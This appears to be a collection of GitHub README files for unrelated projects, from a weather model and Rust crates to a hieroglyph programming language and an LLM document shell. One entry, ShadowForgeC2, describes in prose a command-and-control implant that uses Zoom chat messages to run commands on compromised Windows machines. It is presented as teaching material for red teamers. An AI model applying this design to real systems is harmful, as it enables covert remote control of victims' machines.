`graphcast_demo.ipynb` in [Colaboratory](https://colab.research.google.com/github/deepmind/graphcast/blob/master/graphcast_demo.ipynb), which gives an example of loading data, generating random weights or loading a pre-trained snapshot, generating predictions, computing the loss and computing gradients. The one-step implementation of the GraphCast architecture is provided in `graphcast.py`. ### Brief description of library files: * `autoregressive.py`: Wrapper used to run (and train) the one-step GraphCast to produce a sequence of predictions by auto-regressively feeding the outputs back as inputs at each step, in a JAX-differentiable way (a toy illustration of this idea appears at the end of this README). * `casting.py`: Wrapper used around GraphCast to make it work using BFloat16 precision. * `checkpoint.py`: Utils to serialize and deserialize trees. * `data_utils.py`: Utils for data preprocessing. * `deep_typed_graph_net.py`: General purpose deep graph neural network (GNN) that operates on `TypedGraph`'s where both inputs and outputs are flat vectors of features for each of the nodes and edges. `graphcast.py` uses three of these for the Grid2Mesh GNN, the Multi-mesh GNN and the Mesh2Grid GNN, respectively. * `graphcast.py`: The main GraphCast model architecture for one step of predictions. * `grid_mesh_connectivity.py`: Tools for converting between regular grids on a sphere and triangular meshes. * `icosahedral_mesh.py`: Definition of an icosahedral multi-mesh. * `losses.py`: Loss computations, including latitude-weighting. * `model_utils.py`: Utilities to produce flat node and edge vector features from input grid data, and to manipulate the node output vectors back into multilevel grid data. * `normalization.py`: Wrapper for the one-step GraphCast used to normalize inputs according to historical values, and targets according to historical time differences. * `predictor_base.py`: Defines the interface of the predictor, which GraphCast and all of the wrappers implement. * `rollout.py`: Similar to `autoregressive.py` but used only at inference time, using a python loop to produce longer, but non-differentiable trajectories. * `typed_graph.py`: Definition of `TypedGraph`'s. 
* `typed_graph_net.py`: Implementation of simple graph neural network building blocks defined over `TypedGraph`'s that can be combined to build deeper models. * `xarray_jax.py`: A wrapper to let JAX work with `xarray`s. * `xarray_tree.py`: An implementation of tree.map_structure that works with `xarray`s. ### Dependencies. [Chex](https://github.com/deepmind/chex), [Dask](https://github.com/dask/dask), [Haiku](https://github.com/deepmind/dm-haiku), [JAX](https://github.com/google/jax), [JAXline](https://github.com/deepmind/jaxline), [Jraph](https://github.com/deepmind/jraph), [Numpy](https://numpy.org/), [Pandas](https://pandas.pydata.org/), [Python](https://www.python.org/), [SciPy](https://scipy.org/), [Tree](https://github.com/deepmind/tree), [Trimesh](https://github.com/mikedh/trimesh) and [XArray](https://github.com/pydata/xarray). ### License and attribution The Colab notebook and the associated code are licensed under the Apache License, Version 2.0. You may obtain a copy of the License at: https://www.apache.org/licenses/LICENSE-2.0. The model weights are made available for use under the terms of the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0). You may obtain a copy of the License at: https://creativecommons.org/licenses/by-nc-sa/4.0/. The weights were trained on ECMWF's ERA5 and HRES data. The colab includes a few examples of ERA5 and HRES data that can be used as inputs to the models. ECMWF data product are subject to the following terms: 1. Copyright statement: Copyright "© 2023 European Centre for Medium-Range Weather Forecasts (ECMWF)". 2. Source www.ecmwf.int 3. Licence Statement: ECMWF data is published under a Creative Commons Attribution 4.0 International (CC BY 4.0). https://creativecommons.org/licenses/by/4.0/ 4. Disclaimer: ECMWF does not accept any liability whatsoever for any error or omission in the data, their availability, or for any loss or damage arising from their use. ### Disclaimer This is not an officially supported Google product. Copyright 2023 DeepMind Technologies Limited. ### Citation If you use this work, consider citing our [paper](https://arxiv.org/abs/2212.12794): ```latex @article{lam2022graphcast, title={GraphCast: Learning skillful medium-range global weather forecasting}, author={Remi Lam and Alvaro Sanchez-Gonzalez and Matthew Willson and Peter Wirnsberger and Meire Fortunato and Alexander Pritzel and Suman Ravuri and Timo Ewalds and Ferran Alet and Zach Eaton-Rosen and Weihua Hu and Alexander Merose and Stephan Hoyer and George Holland and Jacklynn Stott and Oriol Vinyals and Shakir Mohamed and Peter Battaglia}, year={2022}, eprint={2212.12794}, archivePrefix={arXiv}, primaryClass={cs.LG} } ```
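### A toy illustration of autoregressive rollout

The autoregressive wrappers described above (`autoregressive.py` and `rollout.py`) feed each prediction back in as an input for the next step. The sketch below is purely conceptual and uses none of this package's APIs; `one_step_model`, `initial_frames` and the toy model are hypothetical stand-ins meant only to illustrate the feedback loop.

```python
from collections import deque

def autoregressive_rollout(one_step_model, initial_frames, num_steps, history=2):
    """Run a one-step model repeatedly, feeding each prediction back as an input."""
    frames = deque(initial_frames, maxlen=history)  # keep only the most recent input frames
    predictions = []
    for _ in range(num_steps):
        prediction = one_step_model(list(frames))   # one forward step (e.g. +6 hours)
        predictions.append(prediction)
        frames.append(prediction)                   # the newest prediction becomes an input
    return predictions

# Toy stand-in for a one-step model: average the input frames and add 1.
toy_model = lambda frames: sum(frames) / len(frames) + 1.0
print(autoregressive_rollout(toy_model, [0.0, 1.0], num_steps=4))
```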
43
3
alloy-rs/rlp
https://github.com/alloy-rs/rlp
Fast implementation of Ethereum RLP serialization
# RLP A fast and simple [Ethereum RLP][rlp] implementation in Rust. [rlp]: https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp [![Build Status][actions-badge]][actions-url] [![Telegram chat][telegram-badge]][telegram-url] [actions-badge]: https://img.shields.io/github/actions/workflow/status/alloy-rs/rlp/ci.yml?branch=main&style=for-the-badge [actions-url]: https://github.com/alloy-rs/rlp/actions?query=branch%3Amain [telegram-badge]: https://img.shields.io/endpoint?color=neon&style=for-the-badge&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Fethers_rs [telegram-url]: https://t.me/ethers_rs ## Supported Rust Versions <!-- When updating this, also update: - .clippy.toml - Cargo.toml - .github/workflows/ci.yml --> Alloy will keep a rolling MSRV (minimum supported rust version) policy of **at least** 6 months. When increasing the MSRV, the new Rust version must have been released at least six months ago. The current MSRV is 1.64.0. Note that the MSRV is not increased automatically, and only as part of a minor release. ## Contributing Thanks for your help improving the project! We are so happy to have you! We have [a contributing guide](./CONTRIBUTING.md) to help you get involved in the Alloy project. Pull requests will not be merged unless CI passes, so please ensure that your contribution follows the linting rules and passes clippy. ## Provenance note These crates were originally part of the [reth] project, as [`reth_rlp`] and [`reth_rlp_derive`]. `reth_rlp` was forked from an earlier Apache-licensed version of the [`fastrlp`] crate, before it changed licence to GPL. The Rust `fastrlp` implementation is itself a port of the [Golang Apache-licensed fastrlp][gofastrlp]. [reth]: https://github.com/paradigmxyz/reth [`reth_rlp`]: https://github.com/paradigmxyz/reth/tree/e2218bea37aa455b4fd6602fe71a8fbe0974f12b/crates/rlp [`reth_rlp_derive`]: https://github.com/paradigmxyz/reth/tree/e2218bea37aa455b4fd6602fe71a8fbe0974f12b/crates/rlp/rlp-derive [`fastrlp`]: https://github.com/vorot93/fastrlp [gofastrlp]: https://github.com/umbracle/fastrlp #### License <sup> Licensed under either of <a href="LICENSE-APACHE">Apache License, Version 2.0</a> or <a href="LICENSE-MIT">MIT license</a> at your option. </sup> <br> <sub> Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion in these crates by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions. </sub>
45
5
CaCaBlocker/react-redux-saga-tailwindcss-typescript
https://github.com/CaCaBlocker/react-redux-saga-tailwindcss-typescript
🅰 Simple project architecture with React & Redux & Saga & Tailwind CSS & Typescript
# Project Architecture ### What are the main skills? ⚽ React.js <br/> ⚾ Redux + Saga <br/> 🥎 Tailwind CSS <br/> 🏀 Typescript <br/> 🏐 Vite <br/> ### Problem https://github.com/innoloft/Frontend-Application ### Solution 🛠 How to run locally ``` npm run dev ``` 🛠 How to lint the code ``` npm run lint ``` 🛠 How to check the code format ``` npm run format:check ``` 🛠 How to format the code ``` npm run format ``` 🛠 How to build ``` npm run build ```
13
2
puzzlet/seshat
https://github.com/puzzlet/seshat
Code like an Egyptian
**Seshat** is a programming language in Egyptian hieroglyphs. Its goal is to make programming easy for anyone who can read and write Egyptian hieroglyphs. "Seshat" (𓋇 Zẖꜣ.t) is the name of an Egyptian goddess. The goddess of writing, architecture, and mathematics, she would definitely be the goddess of programming. ```seshat # hello.seshat 𓁹𓎡 𓏞𓏜𓎡 𓅓 𓌃𓆓𓇋𓐩𓋇𓅨𓂋𓏏𓎟𓏞𓎟𓐪𓏧𓂢 # ir=k zẖꜣ=k ḏd-mdw j.nḏ Zẖꜣ.t Nb.t Wr.t Zẖꜣ Nb.t Jqd.w grḥ # "Do write: "Hail Seshat, the Great, Mistress of the Script, Mistress of the Builders." ``` ```sh $ node build/lib/seshat.js hello.seshat 𓇋𓐩𓋇𓅨𓂋𓏏𓎟𓏞𓎟𓐪𓏧 ``` ## But seriously, there are upsides about ancient Egyptian programming ### Algorithms before antiquity Among the oldest mathematical texts in human history are Rhind Mathematical Papyrus and Moscow Mathematical Papyrus. They mostly consist of problems and their solutions, and the solutions are written as line-by-line instructions. Like a description of an algorithm, they're very programmatic: > Make 10 _heqats_ of the fat into _ro_; it shall become 3200. > Make a year into days; it shall become 365. > Divide 3200 by 365; it shall become 8 + 2/3 + 1/10 + 1/2190. > Make this in [_haqet_ and _ro_ notation]; 1/64 [_haqet_ and] 1/3 + 1/10 + 1/2190 _ro_. > > -- from Rhind Mathematical Papyrus Problem 66 ```python x = heqat_to_ro(10) assert x == 3200 assert days_in_a_year == 365 x = x / days_in_a_year assert x == 8 + 2/3 + 1/10 + 1/2190 result = ro_to_haqet_and_ro(x) assert result.haqet == 1/64 assert result.ro == 1/13 + 1/10 + 1/2190 ``` ### Binary calculations For multiplications and divisions, Egyptians used a method called "doubling." For example, to calculate 2000 * 5, they simply doubled 2000 until the multiplier reachs high enough for 5, and added things up: ``` \ 1 2000 2 4000 \ 4 8000 Total 10000 ``` -- from Rhind Mathematical Papyrus Problem 52 Over 3000 years later, it is similar to how computers multiply numbers every day. ### Type systems everywhere Egyptians used what we call "determinatives" at the ends of words to specify the categories of the meanings of the words. For example, the words 𓊢𓂝𓂻 ꜥḥꜥ "to stand" and 𓊢𓂝𓇤 ꜥḥꜥ "heap, quantity (in mathematics)" share the same spelling 𓊢𓂝 ꜥḥꜥ, but the determinatives 𓂻 and 𓇤 tell the meaning and make the words different. Like when we declare variables in typed programming languages. In Seshat, you might use 𓇤 at the end of a variable to indicate it's about the quantity, namely a number variable. Or a papyrus scroll 𓏛 for the string variables. ## Documentation TODO ## References & Further Readings ### The first books Reimer (2014) is a good introductory book about ancient Egyptian mathematics. If you are interested in Egyptian hieroglyphs for the first time, McDermott (2001) would be a good starter. Collier & Manley (1998) gives more about grammar and vocabulary. - Collier, M. & Manley, B. (1998). _How to read Egyptian hieroglyphs: a step-by-step guide to teach yourself_. Univ of California Press. - [at archive.org](https://archive.org/details/how-to-read-egyptian-hieroglyphs-a-step-by-step-guide-to-teach-yourself-mark-collier-z-library) - 《(대영박물관이 만든) 이집트 상형문자 읽는 법》. 하연희 옮김. 루비박스, 2005. - McDermott, B. (2001). _Decoding Egyptian hieroglyphs: How to read the secret language of the pharaohs_. Chronicle Books. - [at archive.org](https://archive.org/details/decodingegyptian0000mcde) - 《파라오의 비밀문자: 이집트 상형문자 읽는 법》. 권영진 옮김. 예경, 2005. - Reimer, D. (2014). _Count like an Egyptian: a hands-on introduction to ancient mathematics_. Princeton University Press. 
### Language & dictionaries - Allen, J. P. (2000). _Middle Egyptian: An introduction to the language and culture of hieroglyphs_. Cambridge University Press. - [at archive.org](https://archive.org/details/middleegyptianin0000alle) - Budge, E. A. W. (1911). _A Hieroglyphic Vocabulary to the Theban Recension of the Book of the Dead: with an index to all the English equivalents of the Egyptian words_ (Vol. 31). Kegan Paul, Trench, Trübner & Co. Ltd. - [at archive.org](https://archive.org/details/in.ernet.dli.2015.69888) - Budge, E. A. W. (1920). _An Egyptian Hieroglyphic Dictionary: with an index of english words, king list, and geographical list with indexes, list of hieroglyphic characters, coptic and semitic alphabets_ (Vols. 1-2). John Murray. - [Vol. 1 at archive.org](https://archive.org/details/egyptianhierogly01budguoft) - [Vol. 2 at archive.org](https://archive.org/details/egyptianhierogly02budguoft) - Dickson, P. (2006). _Dictionary of middle Egyptian in Gardiner classification order_. - Faulkner, R. O. (1964). _A concise dictionary of Middle Egyptian_. - [at archive.org](https://archive.org/details/concisedictionar0000faul) - Gardiner, A. H. (1927). _Egyptian grammar: being an introduction to the study of hieroglyphs_. 3rd ed. Oxford University Press. - [at archive.org](https://archive.org/details/egyptiangrammar0000alan) - Loprieno, A. (1995). _Ancient Egyptian: a linguistic introduction_. Cambridge University Press. - [at archive.org](https://archive.org/details/ancientegyptianl0000lopr) ### Online dictionaries - Kilani, Marwan. (2000). _Madùwwe Project - [ThotBank dataset](http://maduwwe.herokuapp.com/ThotBank/)_. - [_Ancient Egyptian Dictionary_](https://simondschweitzer.github.io/aed/). - [_Thesaurus Linguae Aegyptiae_](https://aaew.bbaw.de/tla/index.html). ### The texts & researches - Chace, A. B., Archibald, R. C., Bull, L., Glanville, S. R. K., & Manning, H. P. (1929). _The Rhind Mathematical Papyrus. Volume II: Photographs, Transcription Transliteration, Literal Translation_. Mathematical Association of America. - [at archive.org](https://archive.org/details/arnoldbuffumchaceludlowbullhenryparkermanningtherhindmathematicalpapyrus.volumei) - Clagett, M. (1999). _Ancient Egyptian Science: A Source Book_ (vol. 3). American Philosophical Society. - [at archive.org](https://archive.org/details/bub_gb_8c10QYoGa4UC) - Imhausen, A. (2002). _Ägyptische Algorithmen: eine Untersuchung zu den mittelägyptischen mathematischen Aufgabentexten_ (Vol. 65). Harrassowitz Verlag. - Ritter, J. (2002). _Closing the Eye of Horus: The Rise and Fall of 'Horus-eye Fractions'_. In J. M. Steele & A. Imhausen (Eds.), _Under One Sky: Astronomy and Mathematics in the Ancient Near East_ (pp. 297-323). Ugarit-Verlag. - Sethe, K. (1908). _Die altägyptischen Pyramidentexte nach den Papierabdrucken und Photographien des Berliner Museums_, (Vols. 1-2). J. C. Hinrichs'sche Buchhandlung. - [at uchicago.edu](https://www.lib.uchicago.edu/cgi-bin/eos/eos_title.pl?callnum=PJ1553.A1_1908_cop3) - Struve, W. W. (1930). _Mathematischer Papyrus des staatlichen Museums der schönen Künste in Moskau: herausgegeben und kommentiert von WW Struve, unter Benutzung einer hieroglyphischen Transkription von BA Turajeff_ (Quellen und Studien zur Geschichte der Mathematik, Abt. A, Quellen, Band 1). Verlag von Julius Springer.
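As a concrete illustration of the doubling method described in the "Binary calculations" section above, here is a small Python sketch (not part of Seshat itself) that multiplies the way Rhind Mathematical Papyrus Problem 52 does:

```python
def egyptian_multiply(multiplicand, multiplier):
    """Multiply by repeated doubling, as in Rhind Mathematical Papyrus Problem 52."""
    # Build the table of doublings: 1, 2, 4, ... alongside the doubled multiplicand.
    rows = []
    power, value = 1, multiplicand
    while power <= multiplier:
        rows.append((power, value))
        power *= 2
        value *= 2
    # Mark the rows whose left column sums to the multiplier (its binary expansion)
    # and add up the corresponding right-column values.
    total = 0
    for power, value in reversed(rows):
        if multiplier >= power:
            multiplier -= power
            total += value
    return total

print(egyptian_multiply(2000, 5))  # 10000, the same total as the papyrus
```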
45
0
StricaHQ/ouroboros-network-js
https://github.com/StricaHQ/ouroboros-network-js
null
<p align="center"> <a href="https://strica.io/" target="_blank"> <img src="https://docs.strica.io/images/logo.png" width="200"> </a> </p> # @stricahq/ouroboros-network-js Ouroboros network library written in typescript with nodejs streaming module. This library has been developed with extensive testing and research done by communicating with Haskell Cardano Node with edge cases and scenarios. Supports multiplexing and streaming for seamless communication between clients. Simple yet sophisticated project structure and modular design of multiplexer and de-multiplexer to support all ouroboros mini protocols without hassle. ✅ Supports communication over unix socket and TCP ✅ Built using nodejs Stream for efficient communication ✅ Stable multiplexer and de-multiplexer ✅ Modular and scalable design ## Currently Implemented Mini Protocols - Local Chain Sync - Local Transaction Submission - Local Tx Monitor Please note that this is only a networking library and is polymorphic in nature. Use [cbors](https://github.com/StricaHQ/cbors) and [Cardano Codec](https://github.com/StricaHQ/cardano-codec) for decoding and parsing the Cardano data objects returned by the mini protocols. Please create an issue if you want to add support for another mini protocol ## Used By - [cardanoscan.io](https://cardanoscan.io) - [Typhon Wallet](https://typhonwallet.io) ## Installation ### yarn/npm ```sh yarn add @stricahq/ouroboros-network-js ``` ## Tests TODO ## Examples TODO ## API Doc Find the API documentation [here](https://docs.strica.io/lib/ouroboros-network-js) # License Copyright 2023 Strica Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
12
1
BuddyNotFound/bbv-drop
https://github.com/BuddyNotFound/bbv-drop
[FREE] FiveM - Supply Drop Script for QBCore/ESX
# bbv-drop [FREE] FiveM - Supply Drop Script for QBCore/ESX <a href='https://ko-fi.com/G2G0N78P7' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi4.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a> ![dba1bb580921ec0ffa3d73234a2ed8ea76045020](https://github.com/BuddyNotFound/bbv-drop/assets/74051918/5a77024e-c809-425f-8d20-2d45baedbfce) >**BBV X WORLD | Supply Drops - FREE** This script allows admins or allowed players from the config to request 'Supply Drops' using a command. ``` /drop x y z items ``` **Example :** ``` /drop 725.06 1284.01 360.3 weapon_pistol weapon_carbinerifle water ``` After the 3 coords args you can add as many weapons/items as you want; the resource works with QBCore and ESX (ox_target, qb_target). If you don't use ox_target or qb_target there is also a standalone setting inside the config. ``` Config.Settings = { Framework = 'QB', -- QBX/QB/ESX/Custom Target = "OX", -- OX/QB/No # If you DON'T use target set it to 'No' } ``` Admins can spawn drops anywhere, they just need to input the coords and the resource does the rest. Interested in the script? You can download it from here **[Tebex](https://bbv.world/category/free)/[Github](https://github.com/BuddyNotFound/bbv-drop)** **ISSUES :** I've tested and synced the resource as much as I can alone and it's currently working without any issues, but when you test and sync something alone you might miss something, so if you find any issues you can open an issue on [Github](https://github.com) or report it here on the post. (let's hope there are none 🙏) Leave a :heart: if you like my work :blush: . >**SCRIPT PREVIEW** https://streamable.com/vn7m3j [click if video is dead](https://streamable.com/vn7m3j) | | | |-------------------------------------|----------------------------| | Code is accessible | Yes| | Subscription-based | No | | Lines (approximately) | 200+ | | Requirements | QBCore or ESX| | Support | Only fix issues|
12
5
trex-arms/sidecar
https://github.com/trex-arms/sidecar
Assets related to the T.REX ARMS Sidecar and Sidecar attachments
# T.REX ARMS Sidecar Project The [T.REX ARMS Sidecar Holster](https://www.trex-arms.com/store/trex-arms-sidecar-holster/) is designed to be modular and extendable. This repository contains resources that should be enough for anyone to design, manufacture, and sell their Sidecar accessories. These files are licensed under the [MIT license](https://choosealicense.com/licenses/mit/). ## [Spine System](Spine) The T.REX ARMS Sidecar hinges on its Spine System. The Sidecar Spine System was developed with open-source capabilities in mind, since the Spine System is a design that combines the best aspects of both rigid and flexible Sidecar-style holsters. It allows rotation on one axis, which provides comfort, but is extremely rigid on all others, for better concealment. Furthermore, the integrated hinge is simpler, sleeker, and far more modular than other existing connector options. The design is built around as many off-the-shelf tools and parts as possible, both to support end users and other manufacturers. For example, the hinge pin has a diameter of 0.25″ and the hinge teeth are 0.25″ with 0.25″ gaps. Individual Kydex attachments can be made with hand tools, and the Spine also interfaces well with plastic parts, like the [T.REX Raptor Wing](https://www.trex-arms.com/store/sidecar-raptor-wing-attachment/), or certain textiles, like the biothane [T.REX Tourniquet Holder](https://www.trex-arms.com/store/sidecar-tourniquet-attachment/). Included are some prints showing all the dimensions in the Sidecar Spine standard that our holsters will be held to, and some 3D files of different tools used in holster manufacture. ## Accessories We have had excellent results printing these accessories using PLA+ filament on FDM printers like the Ender 3, eSUN’s Hard-Tough resin on SLA printers like the Elgoo Mars line, and having them printed in nylon by professional printers like MK Machining. ### [Dual Wield Adapter](DualWieldAdapter) If you would like to carry and fire two guns whilst jumping through the air, you would need two sidecar holsters connected together with exactly the right amount of separation for pistol optics and exactly the right amount of angle for a quick draw. ### [Extender](Extender) One of the best ways to expand your Sidecar’s comfort and concealability might be to literally expand its width. A number of users have discovered that extending the distance between the holster and mag carrier can improve comfort and stability for certain body types. Since there are many different ways in which you might want to do this, we're including three different widths of file type, as well as a few previous versions. If you make one of these, you will also need an additional pin to assemble it. The Sidecar Spine System will work with almost any 0.25” rod, including standard hinge pins, but you can get extras from us [here](https://www.trex-arms.com/store/sidecar-spine-replacement-hardware/). ### [Wing](Spine/Wing) You know, [one of these](https://www.trex-arms.com/store/sidecar-raptor-wing-attachment/). But there's also an angled one that lets you fold the clips back over the holster for a smaller footprint. These wings are also the ideal starting point for any new adapters designed to connect the spine system to any mounting hardware.
16
3
0xEr3bus/ShadowForgeC2
https://github.com/0xEr3bus/ShadowForgeC2
ShadowForge Command & Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats.
<h1 align="center"> ShadowForge C2 </h1> ShadowForge Command &amp; Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats. ## About ShadowForge C2 ShadowForge C2 is an API-centric Proof of Concept, similar to other C2s. The implant works over HTTP/2 with TLS, connecting through Zoom. The approach taken by this C2 is built upon an implementation strategy that leverages the capabilities of the Zoom Messaging Channel. The implant, residing within the compromised systems, establishes a connection to a designated Zoom Messaging Channel, serving as a secure and discreet communication medium. The domain used has a valid certificate, `api.zoom.us.` ## Why I made this? Why would someone use this? ShadowForge is not a complete C2; its purpose is to give beginners a basic understanding of how this communication works from a team server to the compromised implant. The short purpose is to learn the methodology and steps used during the communication. The C2 doesn't provide any advanced obfuscation, i.e., it's not a ready-to-use C2; this aims to provide a short introduction to using a different secure communication channel. To summarize, the project is intended for other red teamers and security researchers to learn from. ## Getting Started There's a [Quickstart](https://github.com/0xEr3bus/ShadowForgeC2/wiki/) guide to setting up the Zoom API. ## How this works * Implant * A C++-compiled implant, when executed, sends the very first callback to a Zoom Chat Channel hardcoded in the executable. * Every 10 seconds, the implant checks for any updated command to execute; if the command is in this format `command: <COMMAND>,` the implant executes the command. * Once the implant executes the command, it updates the message with `result: <OUTPUT>.` * The communication is done over TLS with HTTP/2; the library used is `wininet.h` * There are quite a few downsides and limitations so far; the most important one is that the API token used to send/receive messages lasts 60 minutes from the time it is generated. * Team Server * Every 12 seconds, a thread on the team server checks if the message is updated with the result; if this message is updated, it just prints the output. * The shell commands are received base64 encoded, as the Zoom Message's format is terrible. The team server decodes and prints them correctly. * Keeping this in mind, the Zoom Channels are effectively man-in-the-middled for the Command & Control communication. * The implant and team server are not connected directly; that being said, the probability of crashing the implant is significantly lower. ## TO-DO - [x] Fix the Zoom API Message Length Limit - Base64 encode the command's output, split the b64-encoded output, and send it as a reply to the parent message. - [ ] Upload/Download Feature - [ ] Some basic Evasion - [ ] Dynamic Sleep Timers - [ ] Self-Destruct Channels
33
4
TransparentLC/saizeriya
https://github.com/TransparentLC/saizeriya
Random order generator for Saizeriya
# Saizeriya random order generator https://akarin.dev/saizeriya/ As the title says. A long time ago a friend's bot in our group chat had a feature like this (the source was probably [Ruan1337/saizeriyarandom.github.io](https://github.com/Ruan1337/saizeriyarandom.github.io)), and while building my own bot I tried rewriting it myself (at its core it is a subset-sum problem solved with dynamic programming); later, when the bot could no longer be used, I decided to turn it into a standalone web page. It uses the [Guangdong-region menu](https://gz-saizeriya.com.cn/portal/list/index/id/19.html); by swapping out the data it should also work for Saizeriya in Shanghai, Hong Kong, Japan and other regions (or even other restaurants)? Due to limitations of the algorithm itself, the generated order will not include more than one serving of the same dish, and per-dish weights are not supported either. More details to be added later (or maybe never 🕊️). ## Running from source This is a project created from Vite's vanilla template, so just `npm install` and then `npm run dev` or `npm run build`. Before running, however, you still need to do the [font subsetting step](https://github.com/TransparentLC/saizeriya/tree/master/src/fusion-pixel-font), which requires Python, so you will also need `pip install -r requirements.txt`. ## Credits * [NES.css](https://nostalgic-css.github.io/NES.css/) * [Fusion Pixel Font](https://fusion-pixel-font.takwolf.com/)
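The subset-sum formulation mentioned above can be sketched as follows. This is only an illustration in Python rather than the project's actual (JavaScript) source; the dish names and prices are made up, and the real tool picks randomly (as its name says) rather than deterministically returning the first combination found.

```python
def pick_dishes(menu, target):
    """0/1 subset-sum via dynamic programming: find one set of dishes
    whose prices add up to exactly `target` (each dish used at most once)."""
    best = [None] * (target + 1)  # best[s] = list of dish names summing to s, or None
    best[0] = []
    for name, price in menu:
        # Iterate sums downwards so each dish is considered at most once.
        for s in range(target, price - 1, -1):
            if best[s] is None and best[s - price] is not None:
                best[s] = best[s - price] + [name]
    return best[target]

# Hypothetical menu (name, price); not the real Saizeriya price list.
menu = [("Garlic bread", 8), ("Escargot", 12), ("Milanese doria", 15), ("Corn soup", 7)]
print(pick_dishes(menu, 27))  # ['Escargot', 'Milanese doria']
```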
13
0
vsraptor/aide
https://github.com/vsraptor/aide
LLM shell and document interogator
## What is this ? This is, in general, a shell around a Large Language Model (LLM), at least for now. It is based on [privateGPT](https://github.com/imartinez/privateGPT) code, which I refactored, componentized and enhanced with additional features. In short, this tool allows you to interact with different document-sets OR simply query an LLM. **Everything runs locally.** ### Features 1. Profile support - multiple docs stores and ability to switch between them on the fly. - multiple models and ability to switch between them on the fly. 2. Non-question Commands support to do useful things 3. System prompts support 4. Better CLI interface 5. Direct and QA query modes. 6. Keeps .history of the commands 7. Keeps .chat_history 8. Multiline support (use Alt+Enter to commit a question) 9. Context support - i.e. how many QA pairs to use as a context. ### Supported LLMs It should support all the models that work on privateGPT (type: LlamaCpp and GPT4All). Here are some I used from huggingface : $ ls ./models TheBloke_OpenAssistant-SFT-7-Llama-30B-GGML TheBloke_WizardLM-13B-Uncensored-GGML TheBloke_WizardLM-7B-GGML TheBloke_Guanaco-65-GGML TheBloke_orca_mini_7B-GGML TheBloke_WizardLM-30B-Uncensored-GGML TheBloke_WizardLM-7B-Landmark #### Using GPU If you use a **GGML** model you can offload some of the layers to the GPU to speed up inference by using the **n_gpu_layers** parameter in the config (for an 8GB GPU, experiment with values 20-40). To be able to use that parameter make sure you install llama-cpp this way : 1. Make sure you have the CUDA toolkit installed apt install nvidia-cuda-toolkit 2. Install llama-cpp. (Use verbose mode to spot problems with installation) CMAKE_ARGS="-DLLAMA_CUBLAS=on" FORCE_CMAKE=1 VERBOSE=1 pip install llama-cpp-python -v 3. Maybe install nvitop or nvtop if you want to watch the GPU status/usage ### Profiles The idea of profiles is to keep multiple configurations and be able to switch between them. Every profile can have many document stores. This allows you to separate them thematically, e.g. one docs store for **economics**, another for **history** ...etc For now you have to manually create the directory structure and configuration if you want to use a profile other than 'main'. Here is the directory structure for the 'main' profile (for new profiles follow the same structure) : tree -d ./profiles -L 3 ./profiles └── main ├── dbs │ ├── main │ └── test └── src ├── main └── test .. and the config file should be in the profile **base** directory : profiles/main/profile.toml The config uses the **.toml** format. https://toml.io/en/ ### Context If you want to ask a sequence of related questions, use the command line parameter **-c** to specify how many QA pairs to use as a context. For example : - Who are the spartans ? - ... - what about the athenians ? - .... - how do the Thebans differ ? - ... If -c 2, the shell will stealthily prepend the previous two QA pairs as a context. ### Installation git clone [email protected]:vsraptor/aide.git cd aide pip install -r requirments.txt ### Running 0. Create a 'models' directory or a symlink to the directory where you host your LLMs 1. Download a model into the ./models directory. (it is a good idea to create a subdir for the specific model) E.g. you can pick this model for a test : https://huggingface.co/TheBloke/WizardLM-7B-GGML/tree/main 3. Configure the model in **profiles/main/profile.toml** Example (you can use any argument supported by Langchain LlamaCpp : https://github.com/mmagnesium/langchain/blob/master/langchain/llms/llamacpp.py): ........ 
[models.main] type='LlamaCpp' target_source_chunks=4 embeddings_model='all-MiniLM-L6-v2' model_path='./models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin' n_ctx=1000 n_batch=16 max_tokens=512 4. Then copy the source docs (.txt, .pdf ...) to the corresponding 'src'-sub-directory (look above dir structure) 5. Next ingest the copied documents. This will create/update the relevant vector-db under 'dbs' dir python3 ingest_docs.py --profile main --db main 6. Finally run the shell python3 run_aide.py --profile main --db main ----- #### Tools $ python3 ingest_docs.py --help usage: ingest_docs.py [-h] [--profile PROFILE] [--db DB] AIDE: Ask questions to your documents without an internet connection, using the power of LLMs. options: -h, --help show this help message and exit --profile PROFILE, -p PROFILE Select profile. --db DB, -d DB Select db. $ python3 run_aide.py -h usage: run_aide.py [-h] [--profile PROFILE] [--model MODEL] [--db DB] [--mute-stream] [--multiline MULTILINE] [--ctx_pairs CTX_PAIRS] AIDE: Ask questions to your documents without an internet connection, using the power of LLMs. options: -h, --help show this help message and exit --profile PROFILE, -p PROFILE Select profile. Default: main --model MODEL, -m MODEL Select model. Default: main --db DB, -d DB Select db. Default: main --mute-stream, -M Use this flag to disable the streaming StdOut callback for LLMs. --multiline MULTILINE, -l MULTILINE Use multiline mode. Alt-Enter commits the question. Default: false --ctx_pairs CTX_PAIRS, -c CTX_PAIRS How many QA pairs to use as a context. Default: 0 ----- ### Interact Check the available commands with !help aide: !help quit - exit the session !mode <qa|direct> - switch the mode of quering. 'qa' uses the docs DB to answer the question. 'direct' asks the model directly. ? <question> - ask the question using the opposite mode !result - print the result structure of the last query !docs <number> - return the nth text snippet used as a context to answer the query !source <number> - source file of the nth document of the result !time - how long it took to generate an answer !db list - list the profile DB's !model list - list all models in the profile !show - show the configuration of ... profile <name> model <name> db <name> !switch db <name> - switch the database for QA mode model <name> - switch the Model > <name> <question> - Insert the question inside the prompt in the place of {body} variable and ask the question. !prompt list - list all template prompts names - list the names all template prompts show <name> - show a prompt template by specified name del <name> - delete a prompt template by specified name save <file-name> - save the prompts to a file load <file-name> - load the prompts from a file ----- #### Example of a simple chat $ python3 run_aide.py --profile main --db main Loading profile : ./profiles/main/profile.toml Profile: main Model: main 